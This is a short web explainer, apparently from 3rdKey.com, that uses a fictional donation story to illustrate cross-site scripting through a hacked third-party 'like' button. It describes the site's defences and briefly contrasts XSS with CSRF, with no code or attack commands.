In short, Cross-Site Scripting (XSS) is the idea of using a script from one server to read or manipulate something on another server.
A web site, TLC.org.za (a worthy orphanage in South Africa), wants to be better known, so it puts a chatter.com like button on its pages.
Dave, a true philanthropist, makes a donation using moneyFriend.com, then clicks the the chatter like button to let his friends know about this worthy cause.
chatter.com runs a script which has Dave "like" and "follow" TLC.org.za, and then tells all of Dave's chatter friends about it.
Good for Dave, good for TLC.org.za, good for chatter.com, everybody's happy
As long as chatter.com is highly moral and ethical and is never hacked. (Have any companies like chatter.com ever been breached? Here's a list of breaches at facebook and here's a list of breaches at twitter
When the chatter.com script runs it can access the cookies and web storage used by TLC.org.za
So if chatter.com is not highly moral and ethical, or if its been hacked, then it can "steal" Dave's moneyFriend.com connection.
But if chatter.com was recently hacked by scumBag.net, and a "virus" script was added to the like function, when Dave clicked "like", his moneyFriend.com details were sent to scumBag.net, and scumBag.net has just sent $1000 of Dave's hard-earned cash to a bank account in Mauritius
The above scenario is purely fictitious, although things like that happen many times every day.
TLC.org.za, is a real orphanage in South Africa, that does wonderful things every day, with very little money
But how does a site like 3rdKey.com prevent this kind of thing from happening?
Any site that understands this problem, including 3rdKey.com, configures their cookies so they can not be accessed by different sites
But additionally, we do not trust any other site, we will not put any script from any other site on any of our pages, ever. that is why you do not find the "like" button on our pages.
[ FAQs]
This can be confused with Cross-Site Scripting, the effect is about the same, but the method is quite different.
In XSS the scumBag.net virus site has stolen Dave's log in by reading goodSite.com's cookies, in CSRF scumBag.net "guesses" that Dave is logged in to goodSite.com, and sends it instructions.